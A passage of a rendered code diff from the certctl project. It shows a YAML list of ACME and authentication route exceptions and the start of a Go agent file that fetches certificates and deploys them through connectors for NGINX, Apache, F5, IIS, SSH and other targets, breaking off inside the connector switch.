why: "ACME server RFC 8555 §7.1.1 directory; documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.1.1 directory; documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "HEAD /acme/profile/{id}/new-nonce"
|
- route: "HEAD /acme/profile/{id}/new-nonce"
|
||||||
why: "ACME server RFC 8555 §7.2 new-nonce; documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.2 new-nonce; documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "GET /acme/profile/{id}/new-nonce"
|
- route: "GET /acme/profile/{id}/new-nonce"
|
||||||
why: "ACME server RFC 8555 §7.2 new-nonce GET form; documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.2 new-nonce GET form; documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/profile/{id}/new-account"
|
- route: "POST /acme/profile/{id}/new-account"
|
||||||
why: "ACME server RFC 8555 §7.3 new-account (JWS jwk); documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.3 new-account (JWS jwk); documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/profile/{id}/account/{acc_id}"
|
- route: "POST /acme/profile/{id}/account/{acc_id}"
|
||||||
why: "ACME server RFC 8555 §7.3.2 + §7.3.6 (JWS kid) account update + deactivation; documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.3.2 + §7.3.6 (JWS kid) account update + deactivation; documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "GET /acme/directory"
|
- route: "GET /acme/directory"
|
||||||
why: "ACME server default-profile shorthand; mirrors per-profile when CERTCTL_ACME_SERVER_DEFAULT_PROFILE_ID is set."
|
why: "ACME server default-profile shorthand; mirrors per-profile when CERTCTL_ACME_SERVER_DEFAULT_PROFILE_ID is set."
|
||||||
|
category: wire-protocol
|
||||||
- route: "HEAD /acme/new-nonce"
|
- route: "HEAD /acme/new-nonce"
|
||||||
why: "ACME server default-profile shorthand for new-nonce HEAD."
|
why: "ACME server default-profile shorthand for new-nonce HEAD."
|
||||||
|
category: wire-protocol
|
||||||
- route: "GET /acme/new-nonce"
|
- route: "GET /acme/new-nonce"
|
||||||
why: "ACME server default-profile shorthand for new-nonce GET."
|
why: "ACME server default-profile shorthand for new-nonce GET."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/new-account"
|
- route: "POST /acme/new-account"
|
||||||
why: "ACME server default-profile shorthand for new-account."
|
why: "ACME server default-profile shorthand for new-account."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/account/{acc_id}"
|
- route: "POST /acme/account/{acc_id}"
|
||||||
why: "ACME server default-profile shorthand for account update + deactivation."
|
why: "ACME server default-profile shorthand for account update + deactivation."
|
||||||
|
category: wire-protocol
|
||||||
|
|
||||||
# Phase 2 — orders + finalize + authz + cert.
|
# Phase 2 — orders + finalize + authz + cert.
|
||||||
- route: "POST /acme/profile/{id}/new-order"
|
- route: "POST /acme/profile/{id}/new-order"
|
||||||
why: "ACME server RFC 8555 §7.4 new-order; documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.4 new-order; documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/profile/{id}/order/{ord_id}"
|
- route: "POST /acme/profile/{id}/order/{ord_id}"
|
||||||
why: "ACME server RFC 8555 §7.4 order POST-as-GET; documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.4 order POST-as-GET; documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/profile/{id}/order/{ord_id}/finalize"
|
- route: "POST /acme/profile/{id}/order/{ord_id}/finalize"
|
||||||
why: "ACME server RFC 8555 §7.4 finalize; documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.4 finalize; documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/profile/{id}/authz/{authz_id}"
|
- route: "POST /acme/profile/{id}/authz/{authz_id}"
|
||||||
why: "ACME server RFC 8555 §7.5 authz POST-as-GET; documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.5 authz POST-as-GET; documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/profile/{id}/challenge/{chall_id}"
|
- route: "POST /acme/profile/{id}/challenge/{chall_id}"
|
||||||
why: "ACME server RFC 8555 §7.5.1 challenge response; dispatches to Phase 3 validator pool."
|
why: "ACME server RFC 8555 §7.5.1 challenge response; dispatches to Phase 3 validator pool."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/profile/{id}/cert/{cert_id}"
|
- route: "POST /acme/profile/{id}/cert/{cert_id}"
|
||||||
why: "ACME server RFC 8555 §7.4.2 cert download; documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.4.2 cert download; documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/new-order"
|
- route: "POST /acme/new-order"
|
||||||
why: "Phase 2 default-profile shorthand for new-order."
|
why: "Phase 2 default-profile shorthand for new-order."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/order/{ord_id}"
|
- route: "POST /acme/order/{ord_id}"
|
||||||
why: "Phase 2 default-profile shorthand for order POST-as-GET."
|
why: "Phase 2 default-profile shorthand for order POST-as-GET."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/order/{ord_id}/finalize"
|
- route: "POST /acme/order/{ord_id}/finalize"
|
||||||
why: "Phase 2 default-profile shorthand for finalize."
|
why: "Phase 2 default-profile shorthand for finalize."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/authz/{authz_id}"
|
- route: "POST /acme/authz/{authz_id}"
|
||||||
why: "Phase 2 default-profile shorthand for authz POST-as-GET."
|
why: "Phase 2 default-profile shorthand for authz POST-as-GET."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/challenge/{chall_id}"
|
- route: "POST /acme/challenge/{chall_id}"
|
||||||
why: "Phase 3 default-profile shorthand for challenge response."
|
why: "Phase 3 default-profile shorthand for challenge response."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/cert/{cert_id}"
|
- route: "POST /acme/cert/{cert_id}"
|
||||||
why: "Phase 2 default-profile shorthand for cert download."
|
why: "Phase 2 default-profile shorthand for cert download."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/profile/{id}/key-change"
|
- route: "POST /acme/profile/{id}/key-change"
|
||||||
why: "ACME server RFC 8555 §7.3.5 doubly-signed key rollover; documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.3.5 doubly-signed key rollover; documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/profile/{id}/revoke-cert"
|
- route: "POST /acme/profile/{id}/revoke-cert"
|
||||||
why: "ACME server RFC 8555 §7.6 revoke-cert (kid OR cert-key auth); documented in docs/acme-server.md."
|
why: "ACME server RFC 8555 §7.6 revoke-cert (kid OR cert-key auth); documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "GET /acme/profile/{id}/renewal-info/{cert_id}"
|
- route: "GET /acme/profile/{id}/renewal-info/{cert_id}"
|
||||||
why: "ACME server RFC 9773 ACME Renewal Information (unauthenticated GET); documented in docs/acme-server.md."
|
why: "ACME server RFC 9773 ACME Renewal Information (unauthenticated GET); documented in docs/acme-server.md."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/key-change"
|
- route: "POST /acme/key-change"
|
||||||
why: "Phase 4 default-profile shorthand for key rollover."
|
why: "Phase 4 default-profile shorthand for key rollover."
|
||||||
|
category: wire-protocol
|
||||||
- route: "POST /acme/revoke-cert"
|
- route: "POST /acme/revoke-cert"
|
||||||
why: "Phase 4 default-profile shorthand for revoke-cert."
|
why: "Phase 4 default-profile shorthand for revoke-cert."
|
||||||
|
category: wire-protocol
|
||||||
- route: "GET /acme/renewal-info/{cert_id}"
|
- route: "GET /acme/renewal-info/{cert_id}"
|
||||||
why: "Phase 4 default-profile shorthand for ARI."
|
why: "Phase 4 default-profile shorthand for ARI."
|
||||||
|
category: wire-protocol
|
||||||
|
|
||||||
# =============================================================================
|
# =============================================================================
|
||||||
# Auth Bundle 2 + audit-2026-05-10/11 fix bundle — REST endpoints not yet
|
# Auth Bundle 2 + audit-2026-05-10/11 fix bundle — REST endpoints not yet
|
||||||
@@ -119,59 +199,3 @@ documented_exceptions:
|
|||||||
# stays green for the v2.1.0 release tag. Threat model + handler contracts
|
# stays green for the v2.1.0 release tag. Threat model + handler contracts
|
||||||
# live in docs/operator/{rbac.md,auth-threat-model.md,oidc-runbooks/*}.
|
# live in docs/operator/{rbac.md,auth-threat-model.md,oidc-runbooks/*}.
|
||||||
# =============================================================================
|
# =============================================================================
|
||||||
- route: "GET /auth/oidc/login"
|
|
||||||
why: "Bundle 2 Phase 5 OIDC login redirect; user-facing 302 with state cookie. OpenAPI rep deferred to pre-2.2.0."
|
|
||||||
- route: "GET /auth/oidc/callback"
|
|
||||||
why: "Bundle 2 Phase 5 OIDC callback handler; RFC 9700 §4.7.1 + RFC 9207. OpenAPI rep deferred to pre-2.2.0."
|
|
||||||
- route: "POST /auth/logout"
|
|
||||||
why: "Bundle 2 Phase 5 cookie + CSRF revoker. OpenAPI rep deferred to pre-2.2.0."
|
|
||||||
- route: "POST /auth/breakglass/login"
|
|
||||||
why: "Bundle 2 Phase 7.5 public break-glass login (auth-bypass, 404 when disabled). OpenAPI rep deferred to pre-2.2.0."
|
|
||||||
- route: "POST /auth/oidc/back-channel-logout"
|
|
||||||
why: "Bundle 2 Phase 5 RFC OIDC Back-Channel Logout 1.0 endpoint. OpenAPI rep deferred to pre-2.2.0."
|
|
||||||
- route: "GET /api/v1/auth/sessions"
|
|
||||||
why: "Bundle 2 Phase 5 self/admin session list. OpenAPI rep deferred to pre-2.2.0."
|
|
||||||
- route: "DELETE /api/v1/auth/sessions/{id}"
|
|
||||||
why: "Bundle 2 Phase 5 session revoke. OpenAPI rep deferred to pre-2.2.0."
|
|
||||||
- route: "DELETE /api/v1/auth/sessions"
|
|
||||||
why: "Bundle 2 audit-2026-05-10 MED-2/3 revoke-all-except-current."
|
|
||||||
- route: "GET /api/v1/auth/oidc/providers"
|
|
||||||
why: "Bundle 2 Phase 5 OIDC provider CRUD (list)."
|
|
||||||
- route: "POST /api/v1/auth/oidc/providers"
|
|
||||||
why: "Bundle 2 Phase 5 OIDC provider CRUD (create)."
|
|
||||||
- route: "PUT /api/v1/auth/oidc/providers/{id}"
|
|
||||||
why: "Bundle 2 Phase 5 OIDC provider CRUD (update)."
|
|
||||||
- route: "DELETE /api/v1/auth/oidc/providers/{id}"
|
|
||||||
why: "Bundle 2 Phase 5 OIDC provider CRUD (delete)."
|
|
||||||
- route: "POST /api/v1/auth/oidc/providers/{id}/refresh"
|
|
||||||
why: "Bundle 2 audit-2026-05-10 MED-7 JWKS hot-refresh."
|
|
||||||
- route: "GET /api/v1/auth/oidc/providers/{id}/jwks-status"
|
|
||||||
why: "Bundle 2 audit-2026-05-10 MED-7 JWKS health snapshot."
|
|
||||||
- route: "POST /api/v1/auth/oidc/test"
|
|
||||||
why: "Bundle 2 audit-2026-05-10 MED-5 dry-run discovery + JWKS + alg-downgrade check."
|
|
||||||
- route: "GET /api/v1/auth/oidc/group-mappings"
|
|
||||||
why: "Bundle 2 Phase 5 group-mapping CRUD (list)."
|
|
||||||
- route: "POST /api/v1/auth/oidc/group-mappings"
|
|
||||||
why: "Bundle 2 Phase 5 group-mapping CRUD (create)."
|
|
||||||
- route: "DELETE /api/v1/auth/oidc/group-mappings/{id}"
|
|
||||||
why: "Bundle 2 Phase 5 group-mapping CRUD (delete)."
|
|
||||||
- route: "GET /api/v1/auth/breakglass/credentials"
|
|
||||||
why: "Bundle 2 Phase 7.5 admin break-glass list (404 when disabled; password hash never on wire)."
|
|
||||||
- route: "POST /api/v1/auth/breakglass/credentials"
|
|
||||||
why: "Bundle 2 Phase 7.5 admin break-glass set/rotate password."
|
|
||||||
- route: "POST /api/v1/auth/breakglass/credentials/{actor_id}/unlock"
|
|
||||||
why: "Bundle 2 Phase 7.5 admin break-glass unlock after lockout."
|
|
||||||
- route: "DELETE /api/v1/auth/breakglass/credentials/{actor_id}"
|
|
||||||
why: "Bundle 2 Phase 7.5 admin break-glass credential delete."
|
|
||||||
- route: "GET /api/v1/auth/users"
|
|
||||||
why: "Bundle 2 audit-2026-05-10 MED-11 users page."
|
|
||||||
- route: "DELETE /api/v1/auth/users/{id}"
|
|
||||||
why: "Bundle 2 audit-2026-05-10 MED-11 user deactivate."
|
|
||||||
- route: "POST /api/v1/auth/users/{id}/reactivate"
|
|
||||||
why: "Bundle 2 audit-2026-05-10 MED-11 user reactivate."
|
|
||||||
- route: "GET /api/v1/auth/runtime-config"
|
|
||||||
why: "Bundle 2 audit-2026-05-10 MED-12 effective auth-runtime-config (read-only)."
|
|
||||||
- route: "POST /api/v1/auth/demo-residual/cleanup"
|
|
||||||
why: "Audit 2026-05-11 A-8 demo-mode residual-grants cleanup endpoint."
|
|
||||||
- route: "GET /api/v1/audit/export"
|
|
||||||
why: "Bundle 1 Phase 8 streaming NDJSON audit export."
|
|
||||||
|
|||||||
+1376
-1
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,443 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package main
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"encoding/json"
|
||||||
|
"encoding/pem"
|
||||||
|
"fmt"
|
||||||
|
"io"
|
||||||
|
"net/http"
|
||||||
|
"os"
|
||||||
|
"path/filepath"
|
||||||
|
"strings"
|
||||||
|
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/target"
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/target/apache"
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/target/awsacm"
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/target/azurekv"
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/target/caddy"
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/target/envoy"
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/target/f5"
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/target/haproxy"
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/target/iis"
|
||||||
|
jks "github.com/certctl-io/certctl/internal/connector/target/javakeystore"
|
||||||
|
k8s "github.com/certctl-io/certctl/internal/connector/target/k8ssecret"
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/target/nginx"
|
||||||
|
pf "github.com/certctl-io/certctl/internal/connector/target/postfix"
|
||||||
|
sshconn "github.com/certctl-io/certctl/internal/connector/target/ssh"
|
||||||
|
"github.com/certctl-io/certctl/internal/connector/target/traefik"
|
||||||
|
wcs "github.com/certctl-io/certctl/internal/connector/target/wincertstore"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 12 (2026-05-14): extracted from
|
||||||
|
// cmd/agent/main.go via the Option B sibling-file pattern.
|
||||||
|
//
|
||||||
|
// This file holds the DEPLOYMENT executor + the target connector
|
||||||
|
// factory + the deploy-only helpers:
|
||||||
|
//
|
||||||
|
// - executeDeploymentJob: handles Pending deployment jobs by
|
||||||
|
// fetching the cert PEM from the control plane, loading the
|
||||||
|
// locally-held private key (in agent keygen mode), instantiating
|
||||||
|
// the appropriate target connector via createTargetConnector,
|
||||||
|
// calling DeployCertificate on it, and reporting Completed or
|
||||||
|
// Failed back to the control plane.
|
||||||
|
// - createTargetConnector: the big switch over target_type that
|
||||||
|
// instantiates one of 14 target connectors (apache / awsacm /
|
||||||
|
// azurekv / caddy / envoy / f5 / haproxy / iis / javakeystore /
|
||||||
|
// k8ssecret / nginx / postfix / ssh / traefik / wincertstore).
|
||||||
|
// Context is threaded into SDK-driven connectors (AWSACM,
|
||||||
|
// AzureKeyVault) so credential resolution honors caller
|
||||||
|
// cancellation per the contextcheck linter — see CI commit
|
||||||
|
// 502823d.
|
||||||
|
// - splitPEMChain: split a PEM chain into (first cert, rest).
|
||||||
|
// - fetchCertificate: pull the PEM chain from
|
||||||
|
// GET /api/v1/certificates/{certID}/version.
|
||||||
|
//
|
||||||
|
// All 14 target-connector imports were used ONLY by
|
||||||
|
// createTargetConnector; moving the factory here also moved the
|
||||||
|
// 14 connector imports out of main.go, leaving the surviving
|
||||||
|
// cmd/agent/main.go with the minimal stdlib surface its lifecycle
|
||||||
|
// + HTTP infrastructure needs.
|
||||||
|
|
||||||
|
// executeDeploymentJob executes a deployment job by fetching the certificate and deploying it
|
||||||
|
// to the target system using the appropriate connector (NGINX, F5 BIG-IP, or IIS).
|
||||||
|
//
|
||||||
|
// For agent keygen mode, the private key is read from the local key store (keyDir/certID.key)
|
||||||
|
// rather than fetched from the server. The deployment includes the locally-held key.
|
||||||
|
//
|
||||||
|
// Flow:
|
||||||
|
// 1. Report job as Running
|
||||||
|
// 2. Fetch the certificate PEM from the control plane
|
||||||
|
// 3. Load local private key if it exists (agent keygen mode)
|
||||||
|
// 4. Instantiate the target connector based on target_type from the work response
|
||||||
|
// 5. Call DeployCertificate on the connector
|
||||||
|
// 6. Report job as Completed (or Failed)
|
||||||
|
func (a *Agent) executeDeploymentJob(ctx context.Context, job JobItem) {
|
||||||
|
a.logger.Info("executing deployment job",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"certificate_id", job.CertificateID,
|
||||||
|
"target_type", job.TargetType)
|
||||||
|
|
||||||
|
// Report job as running
|
||||||
|
if err := a.reportJobStatus(ctx, job.ID, "Running", ""); err != nil {
|
||||||
|
a.logger.Error("failed to report job running", "error", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Fetch the certificate from the control plane
|
||||||
|
certPEM, err := a.fetchCertificate(ctx, job.CertificateID)
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Error("failed to fetch certificate",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"error", err)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("cert fetch failed: %v", err)); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
a.logger.Info("certificate fetched for deployment",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"cert_length", len(certPEM))
|
||||||
|
|
||||||
|
// Split PEM into cert and chain (separated by double newline between PEM blocks)
|
||||||
|
certOnly, chainPEM := splitPEMChain(certPEM)
|
||||||
|
|
||||||
|
// Check for locally-stored private key (agent keygen mode)
|
||||||
|
keyPath := filepath.Join(a.config.KeyDir, job.CertificateID+".key")
|
||||||
|
var keyPEM string
|
||||||
|
keyData, err := os.ReadFile(keyPath)
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Error("failed to read local private key for deployment",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"key_path", keyPath,
|
||||||
|
"error", err)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("key read failed: %v", err)); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
keyPEM = string(keyData)
|
||||||
|
a.logger.Info("loaded local private key for deployment",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"key_path", keyPath)
|
||||||
|
|
||||||
|
// Deploy to the target using the appropriate connector
|
||||||
|
if job.TargetType != "" {
|
||||||
|
connector, err := a.createTargetConnector(ctx, job.TargetType, job.TargetConfig)
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Error("failed to create target connector",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"target_type", job.TargetType,
|
||||||
|
"error", err)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("connector init failed: %v", err)); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// Bundle 1 / RT-C1 closure (2026-05-12): defense in depth. The server
|
||||||
|
// runs internal/connector/target/configcheck.Validate on the way IN
|
||||||
|
// (Create/Update), and rejects shell metacharacters in command-bearing
|
||||||
|
// fields. Re-run the connector's full ValidateConfig here on the way
|
||||||
|
// OUT, before any DeployCertificate call. This catches (a) configs
|
||||||
|
// that pre-date the server-side guard, (b) corruption/tampering of
|
||||||
|
// the encrypted config blob, and (c) per-connector filesystem
|
||||||
|
// invariants (cert dir exists, paths writable) that the server can't
|
||||||
|
// check because the filesystem is on the agent host.
|
||||||
|
if err := connector.ValidateConfig(ctx, job.TargetConfig); err != nil {
|
||||||
|
a.logger.Error("connector config validation failed",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"target_type", job.TargetType,
|
||||||
|
"error", err)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("%s config validation failed: %v", job.TargetType, err)); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
deployReq := target.DeploymentRequest{
|
||||||
|
CertPEM: certOnly,
|
||||||
|
KeyPEM: keyPEM,
|
||||||
|
ChainPEM: chainPEM,
|
||||||
|
TargetConfig: job.TargetConfig,
|
||||||
|
Metadata: map[string]string{
|
||||||
|
"certificate_id": job.CertificateID,
|
||||||
|
"job_id": job.ID,
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
// Phase 2 of the deploy-hardening I master bundle:
|
||||||
|
// per-target deploy mutex. Acquire BEFORE
|
||||||
|
// DeployCertificate so two concurrent renewals against
|
||||||
|
// the same target ID serialize. The lock is held for the
|
||||||
|
// full Deploy duration including PreCommit (validate),
|
||||||
|
// PostCommit (reload), and post-deploy verify (Phases
|
||||||
|
// 4-9). Released on every return path via defer.
|
||||||
|
var targetID string
|
||||||
|
if job.TargetID != nil {
|
||||||
|
targetID = *job.TargetID
|
||||||
|
}
|
||||||
|
if mu := a.targetDeployMutex(targetID); mu != nil {
|
||||||
|
mu.Lock()
|
||||||
|
defer mu.Unlock()
|
||||||
|
}
|
||||||
|
|
||||||
|
result, err := connector.DeployCertificate(ctx, deployReq)
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Error("deployment failed",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"target_type", job.TargetType,
|
||||||
|
"error", err)
|
||||||
|
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("deployment failed: %v", err)); reportErr != nil {
|
||||||
|
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
a.logger.Info("target connector deployment completed",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"target_type", job.TargetType,
|
||||||
|
"success", result.Success,
|
||||||
|
"message", result.Message)
|
||||||
|
|
||||||
|
// If verification is enabled, verify the deployment by probing the live TLS endpoint
|
||||||
|
targetHost, targetPort, err := extractTargetHostAndPort(job.TargetConfig)
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Warn("could not extract target host/port for verification",
|
||||||
|
"job_id", job.ID,
|
||||||
|
"error", err)
|
||||||
|
} else {
|
||||||
|
a.verifyAndReportDeployment(ctx, job, targetHost, targetPort, certOnly)
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
a.logger.Info("no target type specified, skipping connector invocation",
|
||||||
|
"job_id", job.ID)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Report job as completed
|
||||||
|
if err := a.reportJobStatus(ctx, job.ID, "Completed", ""); err != nil {
|
||||||
|
a.logger.Error("failed to report job completed", "error", err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
a.logger.Info("deployment job completed", "job_id", job.ID)
|
||||||
|
}
|
||||||
|
|
||||||
|
// createTargetConnector instantiates the appropriate target connector based on type.
|
||||||
|
// ctx is threaded into SDK-driven connectors (AWSACM, AzureKeyVault) so credential
|
||||||
|
// resolution honors caller cancellation / deadlines instead of using a fresh
|
||||||
|
// context.Background() (the contextcheck linter enforces this — the original Rank 5
|
||||||
|
// implementation used Background() and tripped CI on commit 502823d).
|
||||||
|
func (a *Agent) createTargetConnector(ctx context.Context, targetType string, configJSON json.RawMessage) (target.Connector, error) {
|
||||||
|
switch targetType {
|
||||||
|
case "NGINX":
|
||||||
|
var cfg nginx.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid NGINX config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return nginx.New(&cfg, a.logger), nil
|
||||||
|
|
||||||
|
case "Apache":
|
||||||
|
var cfg apache.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid Apache config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return apache.New(&cfg, a.logger), nil
|
||||||
|
|
||||||
|
case "HAProxy":
|
||||||
|
var cfg haproxy.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid HAProxy config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return haproxy.New(&cfg, a.logger), nil
|
||||||
|
|
||||||
|
case "F5":
|
||||||
|
var cfg f5.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid F5 config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
conn, err := f5.New(&cfg, a.logger)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("failed to create F5 connector: %w", err)
|
||||||
|
}
|
||||||
|
return conn, nil
|
||||||
|
|
||||||
|
case "IIS":
|
||||||
|
var cfg iis.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid IIS config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return iis.New(&cfg, a.logger)
|
||||||
|
|
||||||
|
case "Traefik":
|
||||||
|
var cfg traefik.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid Traefik config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return traefik.New(&cfg, a.logger), nil
|
||||||
|
|
||||||
|
case "Caddy":
|
||||||
|
var cfg caddy.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid Caddy config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return caddy.New(&cfg, a.logger), nil
|
||||||
|
|
||||||
|
case "Envoy":
|
||||||
|
var cfg envoy.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid Envoy config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return envoy.New(&cfg, a.logger), nil
|
||||||
|
|
||||||
|
case "Postfix":
|
||||||
|
var cfg pf.Config
|
||||||
|
cfg.Mode = "postfix"
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid Postfix config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return pf.New(&cfg, a.logger), nil
|
||||||
|
|
||||||
|
case "Dovecot":
|
||||||
|
var cfg pf.Config
|
||||||
|
cfg.Mode = "dovecot"
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid Dovecot config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return pf.New(&cfg, a.logger), nil
|
||||||
|
|
||||||
|
case "SSH":
|
||||||
|
var cfg sshconn.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid SSH config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return sshconn.New(&cfg, a.logger)
|
||||||
|
|
||||||
|
case "WinCertStore":
|
||||||
|
var cfg wcs.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid WinCertStore config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return wcs.New(&cfg, a.logger)
|
||||||
|
|
||||||
|
case "JavaKeystore":
|
||||||
|
var cfg jks.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
